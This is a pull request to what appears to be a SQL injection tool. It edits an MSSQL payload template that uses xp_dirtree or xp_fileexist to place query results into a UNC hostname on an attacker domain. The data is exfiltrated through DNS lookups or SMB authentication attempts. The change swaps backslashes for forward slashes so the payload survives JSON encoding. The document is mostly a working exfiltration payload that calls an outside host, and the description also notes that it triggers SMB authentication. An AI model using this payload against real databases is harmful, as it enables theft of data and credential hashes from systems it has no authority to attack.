### PR TITLE
Change MSSQL dns_request.sql to reduce escaping issues

### DIFF
--- a/data/procs/mssqlserver/dns_request.sql
+++ b/data/procs/mssqlserver/dns_request.sql
@@ -1,4 +1,4 @@
 DECLARE @host varchar(1024);
 SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
-EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
-# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
+EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
+# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')


### PR DESCRIPTION
Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path.

These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.